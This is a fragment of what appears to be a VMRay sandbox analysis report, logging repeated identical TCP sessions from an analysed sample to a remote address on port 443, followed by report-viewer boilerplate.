Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #14
»
Information Value
Handle 0x7d0
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49714
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #15
»
Information Value
Handle 0x7d0
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49714
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #16
»
Information Value
Handle 0x7d0
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49714
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Before

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
After

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image